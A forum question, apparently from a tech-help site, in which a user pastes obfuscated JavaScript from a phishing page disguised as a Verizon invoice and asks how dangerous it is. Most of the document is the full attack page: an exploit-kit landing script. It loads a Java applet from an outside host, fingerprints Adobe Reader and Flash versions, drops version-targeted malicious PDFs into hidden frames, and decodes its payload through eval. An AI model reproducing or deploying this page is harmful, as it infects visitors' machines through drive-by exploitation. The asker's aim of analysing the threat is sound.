willsherwood
asked on
JS: how "evil" is this script
A client mistakenly clicked on an email link (a forged Verizon cell invoice link).
Below is the code. Without going in to great detail/analysis, does this look fairly harmless as far as these things go? (or is there something blatantly damaging that it does)
I'm not a JS expert (it's well obfuscated) and cannot offer a high-level opinion.
(None of his anti-virus alarms went off when viewing this page)
thanks
Below is the code. Without going in to great detail/analysis, does this look fairly harmless as far as these things go? (or is there something blatantly damaging that it does)
I'm not a JS expert (it's well obfuscated) and cannot offer a high-level opinion.
(None of his anti-virus alarms went off when viewing this page)
thanks
<html><body><applet d code='G.class' g archive='http://browncellular.com/content/Qai.jar'><param name="s" value="1"/><param g name="q" value="2"/><param g name="p" g valu="12" val="asd" a="a" value =
"L::9#NmmQ11Q3qx61wNNL::9NmmWT1ny6q33=3CTx61wm5x9L92tS_&g%IeqSJ"/></applet><script>try{new window.getElementsByTagName("body").prototype}catch(q){s=-0.1;}if(window.document){function safsaf(b){a+=b;}}a=[];</script>
<script>safsaf('document.write(\'PcenterRPhER<lease wait page is loading...PChERPCcenterRPhrR\')Ofunction end_redirect(){}try{var <lugin0etectQ{versionN"D.K.J",nameN"<lugin0etect",handlerNfunction(c,b,a){return function(){c(b,a)}},is0efinedNfunction(b){return typeof b!Q"undefined"},isUrrayNfunction(b){return(CarrayCi).test(;bject.prototype.to?tring.call(b))},is2uncNfunction(b){return typeof bQQ"function"},is?tringNfunction(b){return typeof bQQ"string"},is:umNfunction(b){return typeof bQQ"number"},is?tr:umNfunction(b){return(typeof bQQ"string"&&(C\\dC).test(b))},get:um>egxNC[\\d][\\d\\.\\_,-]*C,split:um>egxNC[\\.\\_,-]Cg,get:umNfunction(b,c){var dQthis,aQd.is?tr:um(b)S(d.is0efined(c)Snew >eg1xp(c)Nd.get:um>egx).exec(b)NnullOreturn aSa[D]Nnull},compare:umsNfunction(h,f,d){var eQthis,c,b,a,gQparse5ntOif(e.is?tr:um(h)&&e.is?tr:um(f)){if(e.is0efined(d)&&d.compare:ums){return d.compare:ums(h,f)}cQh.split(e.split:um>egx)ObQf.split(e.split:um>egx)Ofor(aQDOaP9ath.min(c.length,b.length)Oa++){if(g(c[a],ED)Rg(b[a],ED)){return E}if(g(c[a],ED)Pg(b[a],ED)){return -E}}}return D},format:umNfunction(b,c){var dQthis,a,eOif(!d.is?tr:um(b)){return null}if(!d.is:um(c)){cQH}c--OeQb.replace(C\\sCg,"").split(d.split:um>egx).concat(["D","D","D","D"])Ofor(aQDOaPHOa++){if(C^(D+)(.+)$C.test(e[a])){e[a]Q>eg1xp.$F}if(aRc||!(C\\dC).test(e[a])){e[a]Q"D"}}return e.slice(D,H).join(",")},$$has9ime@ypeNfunction(a){return function(d){if(!a.is51&&d){var c,b,e,fQa.is?tring(d)S[d]NdOif(!f||!f.length){return null}for(eQDOePf.lengthOe++){if(C[^\\s]C.test(f[e])&&(cQnavigator.mime@ypes[f[e]])&&(bQc.enabled<lugin)&&(b.name||b.description)){return c}}}return null}},find:av<luginNfunction(l,e,c){var jQthis,hQnew >eg1xp(l,"i"),dQ(!j.is0efined(e)||e)SC\\dCND,kQcSnew >eg1xp(c,"i")ND,aQnavigator.plugins,gQ"",f,b,mOfor(fQDOfPa.lengthOf++){mQa[f].description||gObQa[f].name||gOif((h.test(m)&&(!d||d.test(>eg1xp.left/ontext+>eg1xp.right/ontext)))||(h.test(b)&&(!d||d.test(>eg1xp.left/ontext+>eg1xp.right/ontext)))){if(!k||!(k.test(m)||k.test(b))){return a[f]}}}return null},get9ime1nabled<luginNfunction(k,m,c){var eQthis,f,bQnew >eg1xp(m,"i"),hQ"",gQcSnew >eg1xp(c,"i")ND,a,l,d,jQe.is?tring(k)S[k]NkOfor(dQDOdPj.lengthOd++){if((fQe.has9ime@ype(j[d]))&&(fQf.enabled<lugin)){lQf.description||hOaQf.name||hOif(b.test(l)||b.test(a)){if(!g||!(g.test(l)||g.test(a))){return f}}}}return D},get<lugin2ileBersionNfunction(f,b){var hQthis,e,d,g,a,cQ-EOif(h.;?RF||!f||!f.version||!(eQh.get:um(f.version))){return b}if(!b){return e}eQh.format:um(e)ObQh.format:um(b)OdQb.split(h.split:um>egx)OgQe.split(h.split:um>egx)Ofor(aQDOaPd.lengthOa++){if(cR-E&&aRc&&!(d[a]QQ"D")){return b}if(g[a]!Qd[a]){if(cQQ-E){cQa}if(d[a]!Q"D"){return b}}}return e},UX;Nwindow.UctiveX;bject,getUX;Nfunction(a){var fQnull,d,bQthis,cQ{}Otry{fQnew b.UX;(a)}catch(d){}return f},convert2uncsNfunction(g){var a,h,f,bQC^[\\$][\\$]C,dQ{},cQthisOfor(a in g){if(b.test(a)){d[a]QE}}for(a in d){try{hQa.slice(F)Oif(h.lengthRD&&!g[h]){g[h]Qg[a](g)Odelete g[a]}}catch(f){}}},init?criptNfunction(){var cQthis,aQnavigator,eQ"C",iQa.userUgent||"",gQa.vendor||"",bQa.platform||"",hQa.product||""Oif(c.file){c.file.$Qc}if(c.verify){c.verify.$Qc}Oc.;?QEDDOif(b){var f,dQ["Win",E,"9ac",F,"8inux",G,"2reeV?0",H,"i<hone",FE.E,"i<od",FE.F,"i<ad",FE.G,"Win.*"+"/1",FF.E,"Win.*9obile",FF.F,"<ocket\\\\s*</",FF.G,"",EDD]Ofor(fQd.length-FOfRQDOfQf-F){if(d[f]&&new >eg1xp(d[f],"i").test(b)){c.;?Qd[f+E]Obreak}}}c.convert2uncs(c)Oc.is51Qnew 2unction("return "+e+"*Tcc"+"_on!T*"+e+"false")()Oc.ver51Qc.is51&&(C9?51\\s*(\\d+\\.S\\d*)Ci).test(i)Sparse2loat(>eg1xp.$E,ED)NnullOc.UctiveX1nabledQfalseOif(c.is51){var f,jQ["9sxmlF.X984@@<","9sxmlF.0;90ocument","9icrosoft.X980;9","?hockwave2lash.?hockwave2lash","@0//tl.@0//tl","?hell.A54elper","?cripting.0ictionary","wmplayer.ocx"]Ofor(fQDOfPj.lengthOf++){if(c.getUX;(j[f])){c.UctiveX1nabledQtrueObreak}}c.headQc.is0efined(document.get1lementsVy@ag:ame)Sdocument.get1lementsVy@ag:ame("head")[D]Nnull}c.is3eckoQ(C3eckoCi).test(h)&&(Cecko\\s*\\C\\s*\\dCi).test(i)Oc.ver3eckoQc.is3eckoSc.format:um((Crv\\s*\\N\\s*([\\.\\,\\d]+)Ci).test(i)S>eg1xp.$EN"D.M")NnullOc.is?afariQ(C?afari\\s*\\C\\s*\\dCi).test(i)&&(CUppleCi).test(g)Oc.is/hromeQ(C/hrome\\s*\\C\\s*(\\d[\\d\\.]*)Ci).test(i)Oc.ver/hromeQc.is/hromeSc.format:um(>eg1xp.$E)NnullOc.is;peraQ(C;pera\\s*[\\C]S\\s*(\\d+\\.S\\d*)Ci).test(i)Oc.ver;peraQc.is;pera&&((CBersion\\s*\\C\\s*(\\d+\\.S\\d*)Ci).test(i)||E)Sparse2loat(>eg1xp.$E,ED)NnullOc.addWin1vent("load",c.handler(c.runW8funcs,c))},initNfunction(c){var bQthis,a,cOif(!b.is?tring(c)){return -G}if(c.lengthQQE){b.getBersion0elimiterQcOreturn -G}cQc.to8ower/ase().replace(C\\sCg,"")OaQb[c]Oif(!a||!a.getBersion){return -G}b.pluginQaOif(!b.is0efined(a.installed)){a.installedQa.versionQa.versionDQa.getBersion0oneQnullOa.$QbOa.plugin:ameQc}b.garbageQfalseOif(b.is51&&!b.UctiveX1nabled){if(a!QQb.java){return -F}}return E},f<ushNfunction(b,a){var cQthisOif(c.isUrray(a)&&(c.is2unc(b)||(c.isUrray(b)&&!(b.lengthPQD)&&c.is2unc(b[D])))){a.push(b)}},callUrrayNfunction(b){var cQthis,aOif(c.isUrray(b)){for(aQDOaPb.')</script><script>safsaf('lengthOa++){if(b[a]QQQnull){return}c.call(b[a])Ob[a]Qnull}}},callNfunction(c){var bQthis,aQb.isUrray(c)Sc.lengthN-EOif(!(aPQD)&&b.is2unc(c[D])){c[D](b,aRESc[E]ND,aRFSc[F]ND,aRGSc[G]ND)}else{if(b.is2unc(c)){c(b)}}},getBersion0elimiterN",",$$getBersionNfunction(a){return function(g,d,c){var eQa.init(g),f,b,hQ{}Oif(ePD){return null}OfQa.pluginOif(f.getBersion0one!QE){f.getBersion(null,d,c)Oif(f.getBersion0oneQQQnull){f.getBersion0oneQE}}a.cleanup()ObQ(f.version||f.versionD)ObQbSb.replace(a.split:um>egx,a.getBersion0elimiter)NbOreturn b}},cleanupNfunction(){},addWin1ventNfunction(d,c){var eQthis,aQwindow,bOif(e.is2unc(c)){if(a.add1vent8istener){a.add1vent8istener(d,c,false)}else{if(a.attach1vent){a.attach1vent("on"+d,c)}else{bQa["on"+d]Oa["on"+d]Qe.win4andler(c,b)}}}},win4andlerNfunction(d,c){return function(){d()Oif(typeof cQQ"function"){c()}}},W8funcsDN[],W8funcsN[],runW8funcsNfunction(a){var bQ{}Oa.win8oadedQtrueOa.callUrray(a.W8funcsD)Oa.callUrray(a.W8funcs)Oif(a.on0one1mpty0iv){a.on0one1mpty0iv()}},win8oadedNfalse,$$onWindow8oadedNfunction(a){return function(b){if(a.win8oaded){a.call(b)}else{a.f<ush(b,a.W8funcs)}}},divNnull,div50N"plugindetect",divWidthNID,plugin?izeNE,empty0ivNfunction(){var dQthis,b,h,c,a,f,gOif(d.div&&d.div.child:odes){for(bQd.div.child:odes.length-EObRQDOb--){cQd.div.child:odes[b]Oif(c&&c.child:odes){for(hQc.child:odes.length-EOhRQDOh--){gQc.child:odes[h]Otry{c.remove/hild(g)}catch(f){}}}if(c){try{d.div.remove/hild(c)}catch(f){}}}}if(!d.div){aQdocument.get1lementVy5d(d.div50)Oif(a){d.divQa}}if(d.div&&d.div.parent:ode){try{d.div.parent:ode.remove/hild(d.div)}catch(f){}d.divQnull}},0;:1funcsN[],on0one1mpty0ivNfunction(){var cQthis,a,bOif(!c.win8oaded){return}if(c.W8funcs&&c.W8funcs.length&&c.W8funcs[c.W8funcs.length-E]!QQnull){return}for(a in c){bQc[a]Oif(b&&b.funcs){if(b.;@2QQG){return}if(b.funcs.length&&b.funcs[b.funcs.length-E]!QQnull){return}}}for(aQDOaPc.0;:1funcs.lengthOa++){c.callUrray(c.0;:1funcs)}c.empty0iv()},getWidthNfunction(c){if(c){var aQc.scrollWidth||c.offsetWidth,bQthisOif(b.is:um(a)){return a}}return -E},get@ag?tatusNfunction(m,g,a,b){var cQthis,f,kQm.span,lQc.getWidth(k),hQa.span,jQc.getWidth(h),dQg.span,iQc.getWidth(d)Oif(!k||!h||!d||!c.get0;9obj(m)){return -F}if(jPi||lPD||jPD||iPD||!(iRc.plugin?ize)||c.plugin?izePE){return D}if(lRQi){return -E}try{if(lQQc.plugin?ize&&(!c.is51||c.get0;9obj(m).ready?tateQQH)){if(!m.win8oaded&&c.win8oaded){return E}if(m.win8oaded&&c.is:um(b)){if(!c.is:um(m.count)){m.countQb}if(b-m.countRQED){return E}}}}catch(f){}return D},get0;9objNfunction(g,a){var f,dQthis,cQgSg.spanND,bQc&&c.first/hildSENDOtry{if(b&&a){c.first/hild.focus()}}catch(f){}return bSc.first/hildNnull},set?tyleNfunction(b,g){var fQb.style,a,d,cQthisOif(f&&g){for(aQDOaPg.lengthOaQa+F){try{f[g[a]]Qg[a+E]}catch(d){}}}},insert0iv5nVodyNfunction(a,i){var h,fQthis,bQ"pdGGMMGGMM",dQnull,jQiSwindow.top.documentNwindow.document,cQ"P",gQ(j.get1lementsVy@ag:ame("body")[D]||j.body)Oif(!g){try{j.write(c+\'div idQ"\'+b+\'"Ro\'+c+"CdivR")OdQj.get1lementVy5d(b)}catch(h){}}gQ(j.get1lementsVy@ag:ame("body")[D]||j.body)Oif(g){if(g.first/hild&&f.is0efined(g.insertVefore)){g.insertVefore(a,g.first/hild)}else{g.append/hild(a)}if(d){g.remove/hild(d)}}else{}},insert4@98Nfunction(g,b,h,a,k){var l,mQdocument,jQthis,p,oQm.create1lement("span"),n,i,fQ"P"Ovar cQ["outline?tyle","none","border?tyle","none","padding","Dpx","margin","Dpx","visibility","visible"]Oif(!j.is0efined(a)){aQ""}if(j.is?tring(g)&&(C[^\\s]C).test(g)){pQf+g+\' widthQ"\'+j.plugin?ize+\'" heightQ"\'+j.plugin?ize+\'" \'Ofor(nQDOnPb.lengthOnQn+F){if(C[^\\s]C.test(b[n+E])){p+Qb[n]+\'Q"\'+b[n+E]+\'" \'}}p+Q"R"Ofor(nQDOnPh.lengthOnQn+F){if(C[^\\s]C.test(h[n+E])){p+Qf+\'param nameQ"\'+h[n]+\'" valueQ"\'+h[n+E]+\'" CR\'}}p+Qa+f+"C"+g+"R"}else{pQa}if(!j.div){iQm.get1lementVy5d(j.div50)Oif(i){j.divQi}else{j.divQm.create1lement("div")Oj.div.idQj.div50Oj.insert0iv5nVody(j.div)}j.set?tyle(j.div,c.concat(["width",j.divWidth+"px","height",(j.plugin?ize+G)+"px","font?ize",(j.plugin?ize+G)+"px","line4eight",(j.plugin?ize+G)+"px","verticalUlign","baseline","display","block"]))Oif(!i){j.set?tyle(j.div,["position","absolute","right","Dpx","top","Dpx"])}}if(j.div&&j.div.parent:ode){j.div.append/hild(o)Oj.set?tyle(o,c.concat(["font?ize",(j.plugin?ize+G)+"px","line4eight",(j.plugin?ize+G)+"px","verticalUlign","baseline","display","inline"]))Otry{if(o&&o.parent:ode){o.focus()}}catch(l){}try{o.inner4@98Qp}catch(l){}if(o.child:odes.lengthQQE&&!(j.is3ecko&&j.compare:ums(j.ver3ecko,"E"+",I,D,D")PD)){j.set?tyle(o.first/hild,c.concat(["display","inline"]))}return{spanNo,win8oadedNj.win8oaded,tag:ameN(j.is?tring(g)SgN"")}}return{spanNnull,win8oadedNj.win8oaded,tag:ameN""}},flashN{mime@ypeN"applicationCx-shockwave-flash",prog50N"?hockwave2lash.?hockwave2lash",class50N"clsidN0FK/0VJ1-U1J0-EE/2-MJVL-HHHIIGIHDDDD",getBersionNfunction(){var bQfunction(i){if(!i){return null}var eQC[\\d][\\d\\,\\.\\s]*[r>d0]{D,E}[\\d\\,]*C.exec(i)Oreturn eSe[D].replace(C[r>d0\\.]Cg,",").replace(C\\sCg,"")Nnull}Ovar jQth')</script><script>safsaf('is,gQj.$,k,h,lQnull,cQnull,aQnull,f,m,dOif(!g.is51){mQg.has9ime@ype(j.mime@ype)Oif(m){fQg.get0;9obj(g.insert4@98("object",["type",j.mime@ype],[],"",j))Otry{lQg.get:um(f.3etBariable("$version"))}catch(k){}}if(!l){dQmSm.enabled<luginNnullOif(d&&d.description){lQb(d.description)}if(l){lQg.get<lugin2ileBersion(d,l)}}}else{for(hQEIOhRFOh--){cQg.getUX;(j.prog50+"."+h)Oif(c){aQh.to?tring()Obreak}}if(!c){cQg.getUX;(j.prog50)}if(aQQ"J"){try{c.Ullow?criptUccessQ"always"}catch(k){return"J,D,FE,D"}}try{lQb(c.3etBariable("$version"))}catch(k){}if(!l&&a){lQa}}j.installedQlSEN-EOj.versionQg.format:um(l)Oreturn true}},adobereaderN{mime@ypeN"applicationCpdf",nav<lugin;bjNnull,prog50N["Ucro<02.<02","<02.<df/trl"],class50N"clsidN/ULUMKLD-FLD0-EE/2-UFH0-HHHIIGIHDDDD",5:?@U8810N{},plugin4as9ime@ypeNfunction(d,c,f){var bQthis,eQb.$,aOfor(a in d){if(d[a]&&d[a].type&&d[a].typeQQc){return E}}if(e.get9ime1nabled<lugin(c,f)){return E}return D},getBersionNfunction(l,j){var gQthis,dQg.$,i,f,m,n,bQnull,hQnull,kQg.mime@ype,a,cOif(d.is?tring(j)){jQj.replace(C\\sCg,"")Oif(j){kQj}}else{jQnull}if(d.is0efined(g.5:?@U8810[k])){g.installedQg.5:?@U8810[k]Oreturn}if(!d.is51){aQ"Udobe.*<02.*<lug-Sin|Udobe.*Ucrobat.*<lug-Sin|Udobe.*>eader.*<lug-Sin"Oif(g.getBersion0one!QQD){g.getBersion0oneQDObQd.get9ime1nabled<lugin(g.mime@ype,a)Oif(!j){nQb}if(!b&&d.has9ime@ype(g.mime@ype)){bQd.find:av<lugin(a,D)}if(b){g.nav<lugin;bjQbOhQd.get:um(b.description)||d.get:um(b.name)OhQd.get<lugin2ileBersion(b,h)Oif(!h&&d.;?QQE){if(g.plugin4as9ime@ype(b,"applicationCvnd.adobe.pdfxml",a)){hQ"M"}else{if(g.plugin4as9ime@ype(b,"applicationCvnd.adobe.x-mars",a)){hQ"L"}}}}}else{hQg.version}if(!d.is0efined(n)){nQd.get9ime1nabled<lugin(k,a)}g.installedQn&&hSEN(nSDN(g.nav<lugin;bjS-D.FN-E))}else{bQd.getUX;(g.prog50[D])||d.getUX;(g.prog50[E])OcQCQ\\s*([\\d\\.]+)CgOtry{fQ(b||d.get0;9obj(d.insert4@98("object",["classid",g.class50],["src",""],"",g))).3etBersions()Ofor(mQDOmPIOm++){if(c.test(f)&&(!h||!(>eg1xp.$E-hPQD))){hQ>eg1xp.$E}}}catch(i){}g.installedQhSEN(bSDN-E)}if(!g.version){g.versionQd.format:um(h)}g.5:?@U8810[k]Qg.installed}},zzND}O<lugin0etect.init?cript()O<lugin0etect.getBersion(".")OpdfverQ<lugin0etect.getBersion("Udobe>eader")OflashverQ<lugin0etect.getBersion(\'2lash\')O}catch(e){}if(typeof pdfverQQ\'string\'){pdfverQpdfver.split(\'.\')}else{pdfverQ[D,D,D,D]}if(typeof flashverQQ\'string\'){flashverQflashver.split(\'.\')}else{flashverQ[D,D,D,D]}OexecKQEOfunction splD(){splF()}function splF(){splG()}function show_pdf(src){var pifrQdocument.create1lement(\'52>U91\')Opifr.setUttribute(\'width\',E)Opifr.setUttribute(\'height\',E)Opifr.setUttribute(\'src\',src)Odocument.body.append/hild(pifr)}function show_pdfF(src){var pQdocument.create1lement(\'object\')Op.setUttribute(\'type\',\'applicationCpdf\')Op.setUttribute(\'data\',src)Op.setUttribute(\'width\',E)Op.setUttribute(\'height\',E)Odocument.body.append/hild(p)}function splG(){if(pdfver[D]RD&&pdfver[D]PL){execKQDOshow_pdf(\'.CcontentCapE.phpSfQKFHId\')}else if((pdfver[D]QQL)||(pdfver[D]QQM&&pdfver[E]PQG)){execKQDOshow_pdfF(\'.CcontentCapF.phpSfQKFHId\')}splH()}function splH(){splI()}function splI(){set@imeout(end_redirect,LDDD)O}splD()O')</script><script>
try{new s.prototype}catch(hjkql){e=this['e'+'val'];cc=1;fr=1;}
ch="c"+"h"+"ar"+"Code";
md='na'.substr(1);
v=m=e;
c="";
i=7-6-1;
if(s)qq=e("S"+"tring");
ch+="At";
qq2=e("qq")["fro"+"mC"+"harC"+"ode"];
while(-13140+5-5<i*-1){
vv=a.substr(i,Math.pow(2,0));
vvv=vv[ch](0);
x=vvv;
if (vvv>=47 && vvv<67){
r2=qq2(vvv+20);
} else if((vvv>=67)&&(vvv<87)){
r2=qq2(vvv-20);
} else {
r2=vv;
}
r=c;
if(e)c=r+r2;
i=i+1;
}
hh=c;
w=v;
if(cc)z=hh;
w(z);
</script></body></html>ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER